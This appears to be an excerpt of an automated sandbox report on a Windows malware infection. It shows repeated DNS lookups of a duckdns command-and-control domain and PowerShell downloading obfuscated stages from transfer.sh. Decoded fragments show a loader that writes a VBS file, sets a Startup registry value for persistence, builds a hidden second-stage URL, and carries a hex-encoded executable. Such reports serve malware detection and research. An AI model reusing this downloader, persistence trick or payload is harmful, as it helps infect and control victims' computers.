Sep 14, 2021 21:25:58.587059021 CEST	8.8.8.8	192.168.2.5	0xb711	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:04.902676105 CEST	8.8.8.8	192.168.2.5	0xbba6	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:09.456605911 CEST	8.8.8.8	192.168.2.5	0x4404	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:16.001096010 CEST	8.8.8.8	192.168.2.5	0x4d1f	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:20.728470087 CEST	8.8.8.8	192.168.2.5	0x915	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:25.331617117 CEST	8.8.8.8	192.168.2.5	0xdaa4	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:31.968136072 CEST	8.8.8.8	192.168.2.5	0xa2b0	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:39.117213964 CEST	8.8.8.8	192.168.2.5	0x91ee	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:46.090024948 CEST	8.8.8.8	192.168.2.5	0x8d24	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:53.148999929 CEST	8.8.8.8	192.168.2.5	0xb594	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:26:57.600881100 CEST	8.8.8.8	192.168.2.5	0xc407	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:04.059890032 CEST	8.8.8.8	192.168.2.5	0x1fa7	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:11.096074104 CEST	8.8.8.8	192.168.2.5	0xa19	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:15.558480024 CEST	8.8.8.8	192.168.2.5	0xf6d8	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:22.581969976 CEST	8.8.8.8	192.168.2.5	0x54b3	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:27.054379940 CEST	8.8.8.8	192.168.2.5	0x47d0	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:33.497618914 CEST	8.8.8.8	192.168.2.5	0xa31d	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)
Sep 14, 2021 21:27:38.024162054 CEST	8.8.8.8	192.168.2.5	0xec4e	No error (0)	newjan.duckdns.org	194.147.140.20	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

transfer.sh

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49689	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 19:23:49 UTC	0	OUT	GET /DJr8t4/edrf.txt HTTP/1.1 Host: transfer.sh Connection: Keep-Alive
2021-09-14 19:23:49 UTC	0	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename="edrf.txt" Content-Length: 10841 Content-Type: text/plain; charset=utf-8 Retry-After: Tue, 14 Sep 2021 21:23:53 GMT Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 84.17.52.51 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1631647433 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Tue, 14 Sep 2021 19:23:49 GMT Connection: close
2021-09-14 19:23:49 UTC	0	IN	Data Raw: 24 61 61 20 3d 20 22 32 34 3a 2d 3a 34 36 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 33 61 3a 2d 3a 35 63 3a 2d 3a 35 35 3a 2d 3a 37 33 3a 2d 3a 35 34 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 35 3a 2d 3a 34 33 3a 2d 3a 35 32 3a 2d 3a 35 39 3a 2d 3a 34 33 3a 2d 3a 35 34 3a 2d 3a 35 35 3a 2d 3a 35 36 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 34 32 3a 2d 3a 35 34 3a 2d 3a 34 33 3a 2d 3a 35 32 3a Data Ascii: $aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:
2021-09-14 19:23:49 UTC	1	IN	Data Raw: 34 37 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 37 32 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 32 33 3a 2d 3a 36 66 3a 2d 3a 37 32 3a 2d 3a 37 39 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 35 3a 2d 3a 37 30 3a 2d 3a 36 63 3a 2d 3a 36 31 3a 2d 3a 36 33 3a 2d 3a 36 35 3a 2d 3a 32 38 3a 2d 3a 32 32 3a 2d 3a Data Ascii: 47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:
2021-09-14 19:23:49 UTC	3	IN	Data Raw: 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 37 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 36 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 33 38 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 36 32 3a 2d 3a 36 63 3a 2d 3a 36 39 3a 2d 3a 36 33 3a 2d 3a 35 63 3a 2d 3a 35 32 3a 2d 3a 37 35 3a 2d 3a 36 65 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36 35 Data Ascii: :-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:20:-:3d:-:22:-:43:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:62:-:6c:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65
2021-09-14 19:23:49 UTC	4	IN	Data Raw: 37 34 3a 2d 3a 36 38 3a 2d 3a 32 30 3a 2d 3a 32 34 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 61 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 34 38 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 34 65 3a 2d 3a 36 31 3a 2d 3a 36 64 3a 2d 3a 36 35 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 35 33 3a 2d 3a 37 34 3a 2d 3a 36 31 3a 2d 3a 37 32 3a 2d 3a 37 34 3a 2d 3a 37 35 3a 2d 3a 37 30 3a 2d 3a 32 32 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 35 36 3a 2d 3a 36 31 3a 2d 3a 36 63 3a 2d 3a 37 35 3a 2d 3a 36 35 3a 2d 3a Data Ascii: 74:-:68:-:20:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:-:
2021-09-14 19:23:49 UTC	8	IN	Data Raw: 74 20 48 20 3d 20 4e 6f 74 68 69 6e 67 0d 0a 27 40 0d 0a 53 65 74 2d 43 6f 6e 74 65 6e 74 20 2d 50 61 74 68 20 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 52 75 6e 5c 4e 65 77 2e 76 62 73 20 2d 56 61 6c 75 65 20 24 43 6f 6e 74 65 6e 74 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 0d 0a 24 53 5a 58 44 43 46 56 47 42 48 4e 4a 53 44 46 47 48 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 48 2d 48 73 68 2f 66 7a 66 51 6f 32 2f 73 65 77 77 65 64 48 2d 48 74 78 74 27 2e 52 65 70 6c 61 63 65 28 27 48 2d 48 27 2c 27 2e 27 29 3b 0d 0a 24 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 20 3d 20 22 32 34 3a 2d 3a 34 35 3a 2d 3a 34 34 3a 2d 3a 35 32 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 34 38 3a 2d 3a 34 65 3a 2d 3a 34 61 Data Ascii: t H = Nothing'@Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Contentstart-sleep -s 7$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/fzfQo2/sewwedH-Htxt'.Replace('H-H','.');$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:4a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49693	144.76.136.153	443	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-14 19:24:31 UTC	11	OUT	GET /fzfQo2/sewwed.txt HTTP/1.1 Host: transfer.sh
2021-09-14 19:24:32 UTC	11	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename="sewwed.txt" Content-Length: 512724 Content-Type: text/plain; charset=utf-8 Retry-After: Tue, 14 Sep 2021 21:24:35 GMT Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 84.17.52.51 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1631647475 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Date: Tue, 14 Sep 2021 19:24:32 GMT Connection: close
2021-09-14 19:24:32 UTC	11	IN	Data Raw: 5b 53 74 72 69 6e 67 5d 24 48 48 3d 27 34 44 35 41 39 2d 2d 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 46 46 46 46 2d 2d 2d 2d 42 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 45 31 46 42 41 2d 45 2d 2d 42 34 2d 39 43 44 32 31 42 38 2d 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 2d 37 2d 37 32 36 46 36 37 37 32 36 31 36 44 32 2d 36 33 36 31 36 45 36 45 36 46 37 34 32 2d 36 32 36 35 32 2d 37 32 37 35 36 45 32 2d 36 39 36 45 32 2d 34 34 34 46 35 33 32 2d 36 44 36 46 36 34 36 35 32 45 2d 44 2d 44 2d 41 32 34 Data Ascii: [String]$HH='4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24
2021-09-14 19:24:32 UTC	12	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 32 2d 2d 2d 2d 2d 34 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 45 37 34 36 35 37 38 37 34 2d 2d 2d 2d 2d 2d 39 38 43 37 2d 31 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 43 38 2d 31 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 36 2d 32 45 37 32 36 35 36 43 36 46 36 33 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 43 41 2d 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: ------------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------98C7-1----2-------C8-1-----2----------------------------2-----6-2E72656C6F63-----C-----------2-----2------CA-1-------------
2021-09-14 19:24:32 UTC	14	IN	Data Raw: 2d 32 31 45 31 45 32 44 31 32 32 36 2d 33 31 42 31 36 32 43 2d 46 32 36 32 38 35 32 2d 2d 2d 2d 2d 41 32 38 35 33 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 45 46 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 31 31 2d 32 31 38 31 37 32 44 2d 37 32 36 32 38 35 34 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 31 33 33 2d 2d 31 2d 2d 2d 42 2d 2d 2d 2d 2d 2d 2d 44 2d 2d 2d 2d 31 31 44 2d 2d 35 2d 2d 2d 2d 2d 32 32 38 34 36 2d 2d 2d 2d 2d 41 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 45 2d 2d 2d 2d 31 31 2d 32 31 42 31 39 32 44 2d 37 32 36 32 38 35 35 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 2d 33 33 2d 2d 41 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 41 31 37 32 Data Ascii: -21E1E2D1226-31B162C-F262852-----A2853-----A2A262BEC262BEF------133--3---F-------C----11-218172D-7262854-----A2A262BF7--133--1---B-------D----11D--5-----22846-----A2A--133--3---F-------E----11-21B192D-7262855-----A2A262BF7---33--A---F---------------21A172
2021-09-14 19:24:32 UTC	15	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 32 31 43 31 42 32 44 2d 41 32 36 38 43 2d 38 2d 2d 2d 2d 31 42 32 44 2d 42 32 42 2d 33 32 36 32 42 46 34 32 38 2d 34 2d 2d 2d 2d 32 42 32 41 2d 32 31 36 31 35 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 31 33 33 2d 2d 34 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 33 31 44 31 44 32 44 31 35 32 36 31 32 2d 2d 46 45 31 35 2d 38 2d 2d 2d 2d 31 42 2d 36 31 41 31 36 32 43 2d 41 32 36 38 31 2d 38 2d 2d 2d 2d 31 42 32 41 32 36 32 42 45 39 32 36 32 42 46 34 31 33 33 2d 2d 31 2d 2d 35 35 2d 2d 2d 2d 2d 2d 2d 46 2d 2d 2d 2d 31 31 2d 46 2d 2d 37 42 38 33 2d 2d 2d 2d 2d 34 34 35 2d 34 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 31 2d 2d 2d 2d 2d 2d 2d 31 45 2d 2d 2d 2d 2d 2d 32 43 2d 2d 2d 2d 2d 2d 32 Data Ascii: -------A----11-21C1B2D-A268C-8----1B2D-B2B-3262BF428-4----2B2A-216152D-2262A262BFC----133--4--2--------A----11-31D1D2D152612--FE15-8----1B-61A162C-A2681-8----1B2A262BE9262BF4133--1--55-------F----11-F--7B83-----445-4-------2------1-------1E------2C------2
2021-09-14 19:24:32 UTC	19	IN	Data Raw: 2d 34 2d 33 31 37 31 35 32 44 2d 42 32 36 2d 34 36 46 36 42 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 42 32 36 32 42 46 33 2d 2d 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 41 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 36 31 38 32 44 2d 41 32 36 36 46 36 43 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 46 34 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 37 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 36 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 43 31 Data Ascii: -4-317152D-B26-46F6B-----A2A262BEB262BF3-------33--A--3----------------21C1E2D-A267B19-----42D-62B-3262BF42A-21A152D12267B19-----4-316182D-A266F6C-----A2A262BEC262BF4-33--A--3----------------2171E2D-A267B19-----42D-62B-3262BF42A-216152D12267B19-----4-31C1
2021-09-14 19:24:32 UTC	25	IN	Data Raw: 2d 2d 2d 2d 2d 41 38 2d 33 32 2d 2d 2d 2d 2d 34 32 38 41 36 2d 2d 2d 2d 2d 41 32 38 41 37 2d 2d 2d 2d 2d 41 32 38 36 42 2d 2d 2d 2d 2d 36 32 44 31 43 32 42 31 35 38 2d 34 41 2d 2d 2d 2d 2d 34 32 42 43 41 38 2d 32 41 2d 2d 2d 2d 2d 34 32 42 43 43 38 2d 32 43 2d 2d 2d 2d 2d 34 32 42 43 45 32 38 36 46 2d 2d 2d 2d 2d 36 32 38 37 32 2d 2d 2d 2d 2d 36 32 38 37 33 2d 2d 2d 2d 2d 36 32 38 37 34 2d 2d 2d 2d 2d 36 32 38 36 2d 2d 2d 2d 2d 2d 36 32 38 36 39 2d 2d 2d 2d 2d 36 32 38 36 41 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 36 32 38 37 37 2d 2d 2d 2d 2d 36 32 38 37 41 2d 2d 2d 2d 2d 36 32 38 37 35 2d 2d 2d 2d 2d 36 32 38 37 36 2d 2d 2d 2d 2d 36 32 38 37 38 2d 2d 2d 2d 2d 36 32 38 37 39 2d 2d 2d 2d 2d 36 32 38 37 42 2d 2d 2d 2d 2d 36 32 38 37 43 2d 2d 2d 2d 2d Data Ascii: -----A8-32-----428A6-----A28A7-----A286B-----62D1C2B158-4A-----42BCA8-2A-----42BCC8-2C-----42BCE286F-----62872-----62873-----62874-----6286------62869-----6286A-----62861-----62877-----6287A-----62875-----62876-----62878-----62879-----6287B-----6287C-----
2021-09-14 19:24:32 UTC	26	IN	Data Raw: 2d 2d 2d 2d 36 32 42 2d 33 2d 41 32 42 44 34 31 32 2d 31 32 38 39 38 2d 2d 2d 2d 2d 41 32 44 43 2d 44 45 2d 45 31 32 2d 31 46 45 31 36 31 32 2d 2d 2d 2d 31 42 36 46 36 33 2d 2d 2d 2d 2d 41 44 43 32 41 2d 41 2d 31 31 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 46 2d 2d 35 35 36 34 2d 2d 2d 45 2d 2d 2d 2d 2d 2d 2d 2d 31 42 33 2d 2d 33 2d 2d 32 41 2d 31 2d 2d 2d 2d 32 38 2d 2d 2d 2d 31 31 37 45 37 44 2d 2d 2d 2d 2d 34 32 2d 36 32 32 2d 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 41 38 2d 2d 2d 2d 2d 41 31 44 32 44 2d 42 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 44 2d 36 32 42 2d 33 2d 41 32 42 46 33 32 41 2d 36 32 38 41 46 2d 2d 2d 2d 2d 41 31 37 32 44 31 33 32 36 2d 37 32 38 32 42 2d 31 2d 2d 2d 36 31 38 32 44 2d 43 32 36 2d 38 31 33 2d 39 31 36 31 33 2d 38 32 42 Data Ascii: ----62B-3-A2BD412-12898-----A2DC-DE-E12-1FE1612----1B6F63-----ADC2A-A-11------2---F--5564---E--------1B3--3--2A-1----28----117E7D-----42-622-D-1E28FF-----628A8-----A1D2D-B26-628AE-----A2D-62B-3-A2BF32A-628AF-----A172D1326-7282B-1---6182D-C26-813-91613-82B
2021-09-14 19:24:32 UTC	33	IN	Data Raw: 2d 2d 2d 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 35 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 33 43 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 32 38 35 37 2d 31 2d 2d 2d 36 31 38 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 2d 2d 33 45 32 38 33 44 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 31 37 32 38 38 36 2d 2d 2d 2d 2d 36 32 41 31 33 33 2d 2d 34 2d 2d 32 46 2d 31 2d 2d 2d 2d 33 37 2d 2d 2d 2d 31 31 32 38 33 39 2d 31 2d 2d 2d 36 33 39 32 34 2d 31 2d 2d 2d 2d 37 45 37 43 2d 2d 2d 2d 2d 34 32 44 2d 31 32 41 37 45 37 42 2d 2d 2d 2d 2d 34 32 44 2d 37 37 45 33 31 2d 2d 2d 2d 2d 34 32 42 2d 35 37 45 33 2d 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 37 45 37 42 2d 2d 2d 2d 2d 34 33 39 41 42 2d 2d 2d 2d 2d 2d 32 42 2d 33 2d 41 32 42 46 31 32 38 33 41 2d 31 2d 2d 2d 36 Data Ascii: ------33--9--15--------------283C-1---62D-12A2857-1---6182D-2262A262BFC------3E283D-1---62D-12A172886-----62A133--4--2F-1----37----112839-1---63924-1----7E7C-----42D-12A7E7B-----42D-77E31-----42B-57E3------41A2D-D267E7B-----439AB------2B-3-A2BF1283A-1---6
2021-09-14 19:24:32 UTC	40	IN	Data Raw: 46 31 39 2d 31 2d 2d 2d 41 31 37 32 44 32 43 32 36 37 45 37 45 2d 2d 2d 2d 2d 34 2d 37 32 2d 39 31 32 36 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 45 39 2d 2d 2d 2d 2d 41 32 38 41 38 2d 2d 2d 2d 2d 41 31 38 32 44 31 31 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 43 2d 44 32 42 2d 39 2d 43 32 42 41 44 2d 42 32 42 44 32 2d 41 32 42 45 44 44 45 33 2d 37 45 37 45 2d 2d 2d 2d 2d 34 32 38 46 35 2d 2d 2d 2d 2d 41 32 36 2d 36 31 37 38 44 37 32 2d 2d 2d 2d 2d 31 2d 44 2d 39 31 36 2d 38 41 32 2d 39 32 38 32 41 2d 31 2d 2d 2d 36 32 38 42 38 2d 2d 2d 2d 2d 41 44 45 2d 43 32 38 34 43 2d 2d 2d 2d 2d 41 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 2d 33 2d 43 2d 31 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 39 38 39 2d 2d 2d 43 34 36 2d 2d 2d 2d 2d 31 31 33 Data Ascii: F19-1---A172D2C267E7E-----4-72-9126D-1E28FF-----628E9-----A28A8-----A182D1126-628AE-----A2C-D2B-9-C2BAD-B2BD2-A2BEDDE3-7E7E-----428F5-----A26-6178D72-----1-D-916-8A2-9282A-1---628B8-----ADE-C284C-----A2861-----ADE--2A-3-C-11-------------8989---C46-----113
2021-09-14 19:24:32 UTC	47	IN	Data Raw: 33 2d 31 2d 2d 2d 41 38 2d 33 45 2d 2d 2d 2d 2d 34 32 41 2d 2d 31 33 33 2d 2d 36 2d 2d 31 41 2d 2d 2d 2d 2d 2d 35 36 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 37 2d 45 2d 34 32 38 32 43 2d 31 2d 2d 2d 36 31 35 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 31 42 2d 2d 2d 2d 2d 2d 35 37 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 45 2d 34 2d 45 2d 35 32 38 32 43 2d 31 2d 2d 2d 36 31 39 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 31 33 33 2d 2d 36 2d 2d 33 37 2d 2d 2d 2d 2d 2d 31 37 2d 2d 2d 2d 31 31 31 34 31 37 32 44 31 2d 32 36 37 45 33 39 2d 2d 2d 2d 2d 34 2d 32 36 46 37 32 2d 2d 2d 2d 2d 41 32 43 32 34 32 42 2d 33 2d 41 32 42 45 45 37 45 33 39 Data Ascii: 